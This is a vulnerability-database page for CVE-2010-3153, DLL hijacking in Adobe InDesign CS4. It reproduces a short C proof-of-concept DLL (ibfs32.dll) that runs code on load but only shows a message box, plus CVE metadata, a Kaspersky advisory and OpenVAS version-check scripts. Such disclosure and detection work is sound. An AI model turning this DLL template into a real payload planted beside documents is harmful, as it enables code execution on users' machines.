Search...

Adobe InDesign CS4 DLL Hijacking Exploit ibfs32.dll

2010-08-25T00:00:00

ID EDB-ID:14775
Type exploitdb
Reporter Glafkos Charalambous
Modified 2010-08-25T00:00:00

Description

Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll). CVE-2010-3153. Local exploit for windows platform

                                        
                                            /* 
Exploit Title: Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)
Date: August 25, 2010
Author: Glafkos Charalambous (glafkos[@]astalavista[dot]com)
Version: CS4 v6.0
Tested on: Windows 7 x64 Ultimate
Vulnerable extensions: .indl .indp .indt .inx
Greetz: Astalavista, OffSEC, Exploit-DB
*/

#include &lt;windows.h&gt;

BOOL WINAPI DllMain (
            HANDLE    hinstDLL,
            DWORD     fdwReason,
            LPVOID    lpvReserved)
{
    switch (fdwReason)
	{
	case DLL_PROCESS_ATTACH:
		dll_hijack();
	case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
}

int dll_hijack()
{
  MessageBox(0, "Adobe DLL Hijacking!", "DLL Message", MB_OK);
}

JSON Vulners Source

Initial Source

{"id": "EDB-ID:14775", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Adobe InDesign CS4 DLL Hijacking Exploit ibfs32.dll", "description": "Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll). CVE-2010-3153. Local exploit for windows platform", "published": "2010-08-25T00:00:00", "modified": "2010-08-25T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.exploit-db.com/exploits/14775/", "reporter": "Glafkos Charalambous ", "references": [], "cvelist": ["CVE-2010-3153"], "lastseen": "2016-02-01T20:33:08", "viewCount": 4, "enchantments": {"score": {"value": 8.6, "vector": "NONE", "modified": "2016-02-01T20:33:08", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2010-3153"]}, {"type": "kaspersky", "idList": ["KLA10037"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801508", "OPENVAS:801508"]}], "modified": "2016-02-01T20:33:08", "rev": 2}, "vulnersScore": 8.6}, "sourceHref": "https://www.exploit-db.com/download/14775/", "sourceData": "/* \r\nExploit Title: Adobe InDesign CS4 DLL Hijacking Exploit (ibfs32.dll)\r\nDate: August 25, 2010\r\nAuthor: Glafkos Charalambous (glafkos[@]astalavista[dot]com)\r\nVersion: CS4 v6.0\r\nTested on: Windows 7 x64 Ultimate\r\nVulnerable extensions: .indl .indp .indt .inx\r\nGreetz: Astalavista, OffSEC, Exploit-DB\r\n*/\r\n\r\n#include <windows.h>\r\n\r\nBOOL WINAPI DllMain (\r\n HANDLE hinstDLL,\r\n DWORD fdwReason,\r\n LPVOID lpvReserved)\r\n{\r\n switch (fdwReason)\r\n\t{\r\n\tcase DLL_PROCESS_ATTACH:\r\n\t\tdll_hijack();\r\n\tcase DLL_THREAD_ATTACH:\r\n case DLL_THREAD_DETACH:\r\n case DLL_PROCESS_DETACH:\r\n\tbreak;\r\n\t}\r\n\treturn TRUE;\r\n}\r\n\r\nint dll_hijack()\r\n{\r\n MessageBox(0, \"Adobe DLL Hijacking!\", \"DLL Message\", MB_OK);\r\n}\r\n", "osvdbidlist": ["67563"]}

{"cve": [{"lastseen": "2020-10-03T11:57:28", "description": "Untrusted search path vulnerability in Adobe InDesign CS4 6.0, InDesign CS5 7.0.2 and earlier, Adobe InDesign Server CS5 7.0.2 and earlier, and Adobe InCopy CS5 7.0.2 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse ibfs32.dll that is located in the same folder as an .indl, .indp, .indt, or .inx file.", "edition": 3, "cvss3": {}, "published": "2010-08-27T19:00:00", "title": "CVE-2010-3153", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-3153"], "modified": "2018-10-10T20:01:00", "cpe": ["cpe:/a:adobe:indesign_cs4:6.0"], "id": "CVE-2010-3153", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3153", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:indesign_cs4:6.0:*:*:*:*:*:*:*"]}], "kaspersky": [{"lastseen": "2020-09-02T11:41:32", "bulletinFamily": "info", "cvelist": ["CVE-2010-3153"], "description": "### *Detect date*:\n10/18/2010\n\n### *Severity*:\nCritical\n\n### *Description*:\nA critical vulnerability was found in Adobe InDesign and InCopy. By exploiting this vulnerability malicious users can execute arbitrary code. This vulnerability can be exploited locally and possibly remotely at a point related to an untrusted path via DLL hijacking.\n\n### *Affected products*:\nAdobe InDesign versions CS5 7.0.2 and earlier for Windows \nAdobe InDesign Server versions CS5 7.0.2 and earlier for Windows \nAdobe InCopy versions CS5 7.0.2 and earlier for Windows\n\n### *Solution*:\nUpdate to latest version\n\n### *Original advisories*:\n[Adobe bulletin](<http://www.adobe.com/support/security/bulletins/apsb10-24.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Adobe InDesign CS5](<https://threats.kaspersky.com/en/product/Adobe-InDesign-CS5/>)\n\n### *CVE-IDS*:\n[CVE-2010-3153](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3153>)9.3Critical\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:", "edition": 40, "modified": "2020-06-18T00:00:00", "published": "2010-10-18T00:00:00", "id": "KLA10037", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10037", "title": "\r KLA10037ACE vulnerability in Adobe InDesign ", "type": "kaspersky", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:40:14", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3153"], "description": "This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.", "modified": "2018-12-04T00:00:00", "published": "2010-09-10T00:00:00", "id": "OPENVAS:1361412562310801508", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801508", "type": "openvas", "title": "Adobe InDesign Insecure Library Loading Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_indesign_insecure_lib_load_vuln_win.nasl 12653 2018-12-04 15:31:25Z cfischer $\n#\n# Adobe InDesign Insecure Library Loading Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801508\");\n script_version(\"$Revision: 12653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-04 16:31:25 +0100 (Tue, 04 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-3153\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe InDesign Insecure Library Loading Vulnerability (Windows)\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/41126\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/14775/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_indesign_detect.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the application insecurely loading certain\nlibraries from the current working directory, which could allow attackers to\nexecute arbitrary code by tricking a user into opening a file from a network share.\");\n script_tag(name:\"solution\", value:\"Upgrade Adobe InDesign to version CS4 6.0.6 or later.\");\n script_tag(name:\"summary\", value:\"This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow the attackers to execute\narbitrary code and conduct DLL hijacking attacks.\");\n script_tag(name:\"affected\", value:\"Adobe InDesign version CS4 6.0\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.adobe.com/downloads\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nadVer = get_kb_item(\"Adobe/InDesign/Ver\");\nif(isnull(adVer)){\n exit(0);\n}\n\nadobeVer = eregmatch(pattern:\" ([0-9.]+)\", string:adVer);\nif(!isnull(adobeVer[1]) && (\"CS4\" >< adVer))\n{\n if(version_is_equal(version:adobeVer[1], test_version:\"6.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-3153"], "description": "This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.", "modified": "2017-02-10T00:00:00", "published": "2010-09-10T00:00:00", "id": "OPENVAS:801508", "href": "http://plugins.openvas.org/nasl.php?oid=801508", "type": "openvas", "title": "Adobe InDesign Insecure Library Loading Vulnerability (Windows)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_indesign_insecure_lib_load_vuln_win.nasl 5263 2017-02-10 13:45:51Z teissa $\n#\n# Adobe InDesign Insecure Library Loading Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow the attackers to execute\narbitrary code and conduct DLL hijacking attacks.\n\nImpact Level: Application.\";\n\ntag_affected = \"Adobe InDesign version CS4 6.0\";\n\ntag_insight = \"The flaw is due to the application insecurely loading certain\nlibrairies from the current working directory, which could allow attackers to\nexecute arbitrary code by tricking a user into opening a file from a network\nshare.\";\n\ntag_solution = \"Upgrade Adobe InDesign to version CS4 6.0.6 or later,\nFor updates refer to http://www.adobe.com/downloads\";\n\ntag_summary = \"This host is installed with Adobe InDesign and is prone to insecure\nlibrary loading vulnerability.\";\n\nif(description)\n{\n script_id(801508);\n script_version(\"$Revision: 5263 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-10 14:45:51 +0100 (Fri, 10 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-09-10 16:37:50 +0200 (Fri, 10 Sep 2010)\");\n script_cve_id(\"CVE-2010-3153\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Adobe InDesign Insecure Library Loading Vulnerability (Windows)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/41126\");\n script_xref(name : \"URL\" , value : \"http://www.exploit-db.com/exploits/14775/\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_adobe_indesign_detect.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\n## Check for Adobe InDesign\nadVer = get_kb_item(\"Adobe/InDesign/Ver\");\nif(isnull(adVer)){\n exit(0);\n}\n\nadobeVer = eregmatch(pattern:\" ([0-9.]+)\", string:adVer);\nif(!isnull(adobeVer[1]) && (\"CS4\" >< adVer))\n{\n ## Check for Adobe InDesign CS4 version equals to 6.0\n if(version_is_equal(version:adobeVer[1], test_version:\"6.0\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}